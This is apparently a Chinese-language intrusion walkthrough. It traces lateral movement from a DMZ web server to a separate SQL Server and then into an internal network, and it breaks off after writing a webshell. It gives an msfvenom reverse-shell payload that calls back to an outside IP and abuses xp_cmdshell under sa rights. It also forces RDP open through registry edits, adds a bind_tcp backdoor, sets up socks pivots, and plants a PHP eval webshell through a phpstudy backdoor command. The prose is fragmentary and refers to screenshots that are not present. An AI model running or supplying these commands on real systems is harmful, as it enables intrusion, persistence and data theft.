msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.187 lport=2678 -f exe > ./bd.exe

SQL Server

看到还有一个网卡，是有内网的，加个用户开3389上去看一下

看到确实有三个网站在运行，有一个是.net的，但是本机没有sql server，考虑是不是站库分离的情况。

因此确定ww2.target.com是站库分离的情况，并且直接是sa权限。直接aspx马连一家伙

添加一下xp_cmdshell执行命令

136应该是sql sever ip，先xp_cmdshell强开一波3389

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /fnet start termservice

Socks Proxifier

这里选择用ew来做代理。

看到确实开了，但是proxchains连接不上，估计是防火墙或者其他原因。这里其实还可以选择用msf进行后渗透，我是关掉了DMZ的防火墙。

这里注意，如果ew比较麻烦，不太好上传，那我们可以在msf添加了路由之后，使用auxiliary/server/socks4a这个模块，用msf开个socks代理，这样本机可以通过msf的路由来访问内网，proxychains配置就写本机ip即可。

但还是要用msf添加一下路由

接着我用msfvenom生成bind_tcp的后门，本机Windows通过proxifier(或SocksCap64)连到DMZ的8888端口进而连接SQL Server的3389并开启文件共享，然后执行后门

msfvenom -p windows/meterpreter/bind_tcp lport=2999 -f exe > ./bd_1.exe

而此时因为msf已经添加路由，可以通过路由去主动连SQL Server服务器获取shell

成功获取shell。

再添加一层路由，看一下10.10.1.0/24这个段有什么。

Intranet Web

python .\phpstudy.py "echo ^<?php @eval($_POST[shell]); ?^>>c:\phpstudy\WWW\get.php"